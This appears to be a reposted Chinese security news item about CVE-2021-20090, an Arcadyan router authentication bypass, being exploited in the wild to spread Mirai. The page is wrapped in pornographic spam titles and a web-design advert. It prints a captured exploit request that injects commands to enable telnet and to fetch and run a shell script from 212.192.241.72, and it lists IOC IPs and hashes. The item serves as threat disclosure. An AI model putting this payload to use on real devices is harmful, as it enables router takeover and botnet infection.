日韩无码专区无码一级三级片|91人人爱网站中日韩无码电影|厨房大战丰满熟妇|AV高清无码在线免费观看|另类AV日韩少妇熟女|中文日本大黄一级黄色片|色情在线视频免费|亚洲成人特黄a片|黄片wwwav色图欧美|欧亚乱色一区二区三区

RELATEED CONSULTING
相關(guān)咨詢
選擇下列產(chǎn)品馬上在線溝通
服務(wù)時(shí)間:8:30-17:00
你可能遇到了下面的問題
關(guān)閉右側(cè)工具欄

新聞中心

這里有您想知道的互聯(lián)網(wǎng)營銷解決方案
新漏洞正被在野利用,影響數(shù)百萬路由器

CVE-2021-20090是一個(gè)由Tenable發(fā)現(xiàn)并在2021年8月3日公布的漏洞?,F(xiàn)在,研究人員發(fā)現(xiàn)了其正在被在野利用。

創(chuàng)新互聯(lián)公司專注于凌云企業(yè)網(wǎng)站建設(shè),響應(yīng)式網(wǎng)站建設(shè),電子商務(wù)商城網(wǎng)站建設(shè)。凌云網(wǎng)站建設(shè)公司,為凌云等地區(qū)提供建站服務(wù)。全流程按需定制網(wǎng)站,專業(yè)設(shè)計(jì),全程項(xiàng)目跟蹤,創(chuàng)新互聯(lián)公司專業(yè)和態(tài)度為您提供的服務(wù)

該漏洞是一個(gè)路徑繞過漏洞,可導(dǎo)致認(rèn)證繞過,攻擊者可以利用其接管受影響設(shè)備的控制權(quán)。

根據(jù) Tenable 的相關(guān)信息披露,CVE-2021-20090 漏洞被發(fā)現(xiàn)實(shí)際存在于 Arcadyan 固件中,這不僅影響了最初發(fā)現(xiàn)的 Buffalo 路由器,還影響了更多的設(shè)備。

影響范圍如下所示:

在野利用

Juniper 威脅實(shí)驗(yàn)室近期也發(fā)現(xiàn)攻擊者正在在野利用編號(hào)為 CVE-2021-20090 的身份驗(yàn)證繞過漏洞,攻擊者通過其傳播 Mirai 惡意軟件。

 
 
 
    
  
  
  
  1. POST /images/..%2fapply_abstract.cgi HTTP/1.1  
    2. 
  
  
  
  2. Connection: close  
    3. 
  
  
  
  3. User-Agent: Dark  
    4. 
  
  
  
  4. action=start_ping&submit_button=ping.html&action_params=blink_time%3D5&ARC_ping_ipaddress=212.192.241.7%0A
    5. 
  
  
  
  5. ARC_SYS_TelnetdEnable=1&%0AARC_SYS_=cd+/tmp;
    6. 
  
  
  
  6. wget+http://212.192.241.72/lolol.sh;
    7. 
  
  
  
  7. curl+-O+http://212.192.241.72/lolol.sh;
    8. 
  
  
  
  8. chmod+777+lolol.sh;
    9. 
  
  
  
  9. sh+lolol.sh&ARC_ping_status=0&TMP_Ping_Type=4 
    10.

不止 CVE-2021-20090,新發(fā)現(xiàn)的攻擊團(tuán)伙也頻繁利用新漏洞擴(kuò)充軍火庫:

  • CVE-2020-29557(DLink routers)
  • CVE-2021-1497(Cisco HyperFlex)
  • CVE-2021-1498(Cisco HyperFlex)
  • CVE-2021-31755(Tenda AC11)
  • CVE-2021-22502(MicroFocus OBR)
  • CVE-2021-22506(MicroFocus AM)
  • exploit-db 未分配 CVE 編號(hào)但存在 PoC 的 exploit

IOC

 
 
 
    
  
  
  
  1. 27.22.80.19 
    2. 
  
  
  
  2. 212.192.241.72
    3. 
  
  
  
  3. 9793ac5afd1be5ec55476d2c205260d1b7af6db7cc29a9dc0f7fbee68a177c78
    4. 
  
  
  
  4. 73edf8bfbbeaccdd84204f24402dcf488c3533be2682724e5906396b9237411d
    5. 
  
  
  
  5. 8bb454cd942ce6680f083edf88ffa31661a47a45eb3681e1b36dd05043315399
    6. 
  
  
  
  6. f83eadaa00e81ad51e3ab479b900b981346895b99d045a6b6f77491c3132b-58c
    7. 
  
  
  
  7. e4bc34e321b31926fd2fa1696136187b13864dfa03fba6848e59f9f72bfa9529
    8. 
  
  
  
  8. 80331cf89f3e6026b33b8f1bfa1c304295b9327311661d7927f78824f04cf528
    9. 
  
  
  
  9. 904f9b2e029595365f4f4426069b274810510908c7dd23a3791a831f51e9f1fc
    10. 
  
  
  
  10. 283f932f30756408a59dac97a6965eb792915242214d590eab1c6cb049148582
    11. 
  
  
  
  11. c2f5bbf35afc7335f789e420c23c43a069ecfcca1a8f9fac5cd554a7a769440e
    12. 
  
  
  
  12. 70764ef9800c1d09f965fbb9698d0eda52448b23772d118f2f2c4ba37b59fc20
    13.

網(wǎng)頁題目:新漏洞正被在野利用,影響數(shù)百萬路由器
鏈接分享:http://www.5511xx.com/article/djscjsi.html